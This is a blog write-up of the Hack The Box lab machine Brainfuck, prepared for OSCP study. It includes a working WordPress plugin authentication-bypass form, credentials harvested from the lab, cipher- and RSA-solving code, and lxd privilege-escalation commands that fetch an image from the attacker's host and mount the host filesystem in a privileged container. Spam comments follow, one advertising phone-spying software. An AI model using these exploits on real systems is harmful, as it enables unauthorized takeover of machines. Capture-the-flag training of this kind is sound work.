OSCP PREPARATIONS - HTB Brainfuck

Brainfuck is a retired Linux machine on Hack The Box. The goal is to obtain the user and root flags by exploiting its vulnerabilities.
We start with an nmap scan to get to know the target machine.
Classic Scan

Full Port Scan

The scan shows the following open ports: 22/tcp ssh (OpenSSH), 25/tcp smtp (Postfix smtpd), 110/tcp pop3 (Dovecot pop3d), 143/tcp imap (Dovecot imapd) and 443/tcp ssl/http (nginx).

The scan of port 443 gives us the domain name and the DNS names from the TLS certificate (its common name and subject alternative names); we added them to the /etc/hosts file.

Then let’s access these sites.
https://brainfuck.htb/

Wappalyzer shows that the site runs the WordPress CMS, so let's scan it with wpscan.

Here we see that the ticket plugin (WP Support Plus Responsive Ticket System) is an old version. Note it and continue enumeration.
User enumeration
wpscan --url https://brainfuck.htb --disable-tls-checks --enumerate u

The users admin and administrator were found.
Next we look for a vulnerability in the detected version of the WP Support Plus Responsive Ticket System plugin.

Exploit-DB lists both a SQL injection and a privilege escalation (authentication bypass) for this plugin version. The privilege escalation is the simpler one: the plugin's loginGuestFacebook AJAX action logs in any existing WordPress username without checking a password. Let's see how to use it.

Create an HTML file with the form given in the exploit (the username must be one that exists, which is why the enumeration step mattered) and save it on the attacker machine:
<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
        Username: <input type="text" name="username" value="administrator">
        <input type="hidden" name="email" value="sth">
        <input type="hidden" name="action" value="loginGuestFacebook">
        <input type="submit" value="Login">
</form>
We served this file with a simple Python web server, opened it in the browser and submitted the form. The response set a WordPress login cookie, so we were logged in.

Removing wp-admin/admin-ajax.php from the URL and browsing to the site showed that we were logged in as an administrator.

The admin dashboard confirms that we are logged in.
Let's continue enumeration from here.
The "dev update" note on the site suggests something related to SMTP.

Let's open the SMTP settings of the plugin.

The SMTP settings contain the password "kHGuERB29DNiNE" for the user orestis.
Let's use these credentials to connect to the mail server (POP3 and IMAP were open in the scan) and read the mailbox.

Hi there, your credentials for our “secret” forum are below 🙂

username: orestis
password: kIEnnfEKJ#9UmdO
So we now have the credentials for the "secret" forum. The secret forum is presumably the other subdomain from the certificate that we added to /etc/hosts; let's log in there with these credentials.

There we find a forum thread about the SSH key.

The thread contains encrypted messages.
Let's try to make sense of them.

They turn out to be encrypted with a Vigenère cipher.
Let's break these messages. With a fragment of known plaintext the key falls out directly as the per-letter shift between plaintext and ciphertext; without one, a frequency-analysis solver will do.

Decrypting them reveals the URL of an SSH private key: https://brainfuck.htb/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa.
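As an added example (not code from the original write-up), here is the known-plaintext approach in Python: encrypt and decrypt with a Vigenère key, derive the per-letter shifts between the ciphertext and a fragment of plaintext we know, and collapse them to the shortest repeating key. The key LEMON and the message are constructed for the demo; the forum's real ciphertext and key are not reproduced here.

```python
import string

ALPHABET = string.ascii_uppercase  # 26 letters; everything else passes through


def vigenere(text: str, key: str, decrypt: bool = False) -> str:
    """Encrypt (or decrypt) text with a Vigenère key.

    Only letters are shifted; spaces and punctuation are copied through and
    do not consume key characters, matching how most online solvers behave.
    """
    key = key.upper()
    out = []
    j = 0  # key index, advanced only on letters
    for ch in text:
        if ch.isalpha():
            k = ALPHABET.index(key[j % len(key)])
            if decrypt:
                k = -k
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + k) % 26 + base))
            j += 1
        else:
            out.append(ch)
    return "".join(out)


def keystream_from_known_plaintext(ciphertext: str, known: str, letter_offset: int = 0) -> str:
    """Per-letter shift between the ciphertext and a known plaintext fragment.

    letter_offset is how many letters of the message precede the fragment.
    """
    c_letters = [c for c in ciphertext if c.isalpha()][letter_offset:]
    p_letters = [p for p in known if p.isalpha()]
    return "".join(
        ALPHABET[(ord(c.upper()) - ord(p.upper())) % 26]
        for c, p in zip(c_letters, p_letters)
    )


def shortest_period(stream: str) -> str:
    """Smallest prefix that, repeated, reproduces the whole stream."""
    for n in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return stream[:n]
    return stream


def recover_key(ciphertext: str, known: str, letter_offset: int = 0) -> str:
    """Recover the Vigenère key from a known-plaintext fragment.

    The fragment should contain clearly more letters than the key; with a
    fragment shorter than the key the detected period is too short and the
    key is wrong (a caveat when only a short signature line is known).
    """
    stream = keystream_from_known_plaintext(ciphertext, known, letter_offset)
    p = len(shortest_period(stream))
    # stream[i] == key[(letter_offset + i) % p], so rotate back to key[0].
    return "".join(stream[(j - letter_offset) % p] for j in range(p))


if __name__ == "__main__":
    # Constructed demo data, not the forum's real messages or key.
    key = "LEMON"
    message = "ATTACK AT DAWN. The key is under the mat"
    ct = vigenere(message, key)
    guessed = recover_key(ct, "ATTACK AT DAWN")  # we know how the post starts
    print(guessed, "->", vigenere(ct, guessed, decrypt=True))
```

If the known text sits in the middle of a message (a signature line, for instance), count the letters before it and pass that as letter_offset; the recovered key is rotated back so it lines up with the start of the message.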

The id_rsa key is passphrase-protected, so connecting with it prompts for a passphrase. Let's crack it with John the Ripper (convert the key with ssh2john, then run john with a wordlist).

John cracked the passphrase: 3poulakia!. With the key and the passphrase we can SSH in as orestis.

Here we get the user flag, but we cannot access root because we do not have root privileges.
The files debug.txt, encrypt.sage and output.txt in the home directory are remarkable. Reading them shows that they are an RSA encryption of root.txt.

By solving this RSA, root.txt can be read, but that does not give us a root shell, so we looked at local enumeration for a way to obtain one.
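As an added example, not the page's own code, the following Python recovers the plaintext once p, q, e and the ciphertext c are known. It assumes the layout these files usually have: debug.txt holds p, q and e, output.txt holds c, and encrypt.sage packed the flag text as a big-endian integer before computing pow(m, e, n); check encrypt.sage before relying on that. The numbers in the demo are textbook toy parameters (p=61, q=53, e=17), not the values from the box.

```python
from math import gcd


def modinv(a: int, m: int) -> int:
    """Modular inverse of a mod m via the extended Euclidean algorithm."""
    r0, r1, s0, s1 = a, m, 1, 0
    while r1:
        q = r0 // r1
        r0, r1 = r1, r0 - q * r1
        s0, s1 = s1, s0 - q * s1
    if r0 != 1:
        raise ValueError(f"{a} has no inverse modulo {m}")
    return s0 % m


def rsa_private_exponent(p: int, q: int, e: int) -> int:
    """d = e^-1 mod phi(n). Fails loudly if e is not coprime to phi(n)."""
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e is not coprime to phi(n): not valid RSA parameters")
    return modinv(e, phi)


def rsa_encrypt(p: int, q: int, e: int, m: int) -> int:
    """Textbook RSA, as a script like encrypt.sage would do it: c = m^e mod n."""
    n = p * q
    if not 0 <= m < n:
        raise ValueError("message integer must be smaller than n")
    return pow(m, e, n)


def rsa_decrypt(p: int, q: int, e: int, c: int) -> int:
    """Textbook decryption: m = c^d mod n, with d derived from p, q and e."""
    n = p * q
    d = rsa_private_exponent(p, q, e)
    return pow(c, d, n)


def rsa_decrypt_crt(p: int, q: int, e: int, c: int) -> int:
    """Same result via the Chinese Remainder Theorem; much faster for real-size keys."""
    d = rsa_private_exponent(p, q, e)
    m1 = pow(c, d % (p - 1), p)
    m2 = pow(c, d % (q - 1), q)
    h = (modinv(q, p) * (m1 - m2)) % p
    return m2 + h * q


def int_to_bytes(m: int) -> bytes:
    """Undo int(text.hex(), 16)-style packing; uses the minimal byte length."""
    return m.to_bytes(max(1, (m.bit_length() + 7) // 8), "big")


def bytes_to_int(b: bytes) -> int:
    return int.from_bytes(b, "big")


if __name__ == "__main__":
    # Toy parameters from the textbook example, not the values in debug.txt.
    p, q, e = 61, 53, 17
    c = rsa_encrypt(p, q, e, bytes_to_int(b"A"))
    print(c, rsa_decrypt(p, q, e, c), int_to_bytes(rsa_decrypt_crt(p, q, e, c)))
```

With the real values, paste p, q, e and c from the files into rsa_decrypt and pass the result through int_to_bytes; if the output is not readable text, the packing in encrypt.sage differs from the assumption above and int_to_bytes has to be adjusted to match it.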

Local enumeration shows that our user is a member of the lxd group.
Let's see if this can be used for privilege escalation: an lxd group member can launch a privileged container with the host's filesystem mounted inside it, which is as good as root on the host.
https://www.hackingarticles.in/lxd-privilege-escalation/
The procedure given at that address was carried out step by step.
commands applied in order
on the attacker machine
1- git clone https://github.com/saghul/lxd-alpine-builder.git
2- cd lxd-alpine-builder
3- ./build-alpine
4- python -m SimpleHTTPServer
on the target machine
1- wget 10.10.14.19:8000/alpine-v3.18-x86_64-20230927_0640.tar.gz
2- lxc image import ./alpine-v3.18-x86_64-20230927_0640.tar.gz --alias myimage
3- lxc image list
4- lxc init myimage ignite -c security.privileged=true
5- lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
6- lxc start ignite
7- lxc exec ignite /bin/sh
8- id
9- cd /mnt/root/root
10- ls
11- cat root.txt

The tarball name is whatever build-alpine produced on the attacker side (it contains the build date), so adjust the two file names on the target accordingly; with Python 3 the web server is started with python3 -m http.server instead. The two options that matter are security.privileged=true, which makes root inside the container the real root on the host, and the disk device that mounts the host's / under /mnt/root, so the container's root can read every file on the host, including /root/root.txt.

This is how we got the root flag.

Comments

  1. Genny

    I will immediately take hold of your RSS feed as I can not
    find your e-mail subscription link or newsletter service.
    Do you have any? Kindly let me know so that I
    may subscribe. Thanks.

  2. Honora

    Hi there just wanted to give you a brief heads up and let you know a few of the pictures aren’t loading correctly.
    I’m not sure why but I think it’s a linking issue.
    I’ve tried it in two different internet browsers and
    both show the same outcome.

  3. Cristino

    Heya! I just wanted to ask if you ever have any trouble with hackers?
    My last blog (wordpress) was hacked and I ended up losing several weeks of hard
    work due to no data backup. Do you have any solutions
    to prevent hackers?

  4. Tearra

    Wow, incredible blog layout! How long have you been blogging for?
    You make blogging look easy. The overall look of your website is excellent, as well as the content!

  5. Kerbi

    Oh my goodness! Incredible article dude! Thank you. However, I am
    going through troubles with your RSS. I don’t
    know why I am unable to join it. Is there anybody else getting the same RSS issues?
    Anyone that knows the solution can you kindly respond? Thanks!!

  6. sklep internetowy

    Please let me know if you’re looking for an article author
    for your weblog. You have some really great articles and I think I would be a good asset.
    If you ever want to take some of the load off,
    I’d really like to write some material for your blog in exchange for a link back to mine.

    Please blast me an email if interested. Cheers!

    I saw similar here: Sklep online

  7. najlepszy sklep

    Hey! Do you know if they make any plugins to help with SEO?
    I’m trying to get my blog to rank for some targeted
    keywords but I’m not seeing very good gains. If you know of any please share.
    Appreciate it! You can read similar art here: Ecommerce

  8. sklep online

    Hi there! Do you know if they make any plugins to help with Search
    Engine Optimization? I’m trying to get my blog to rank for
    some targeted keywords but I’m not seeing very good results.

    If you know of any please share. Many thanks!
    You can read similar text here: Sklep internetowy

  9. Phone Tracker Free

    CellSpy mobile phone monitoring software is a very safe and complete tool, it is the best choice for effective monitoring of mobile phones. App can monitor various types of messages, such as SMS, email, and instant messaging chat applications such as Snapchat, Facebook, Viber, and Skype. You can view all the contents of the target device: GPS location, photos, videos and browsing history, keyboard input, etc.

  10. hitman.agency

    Good day! Do you know if they make any plugins to assist with Search Engine Optimization? I’m trying to get my
    website to rank for some targeted keywords but I’m not seeing very good
    results. If you know of any please share. Cheers!
    You can read similar text here: Hitman.agency
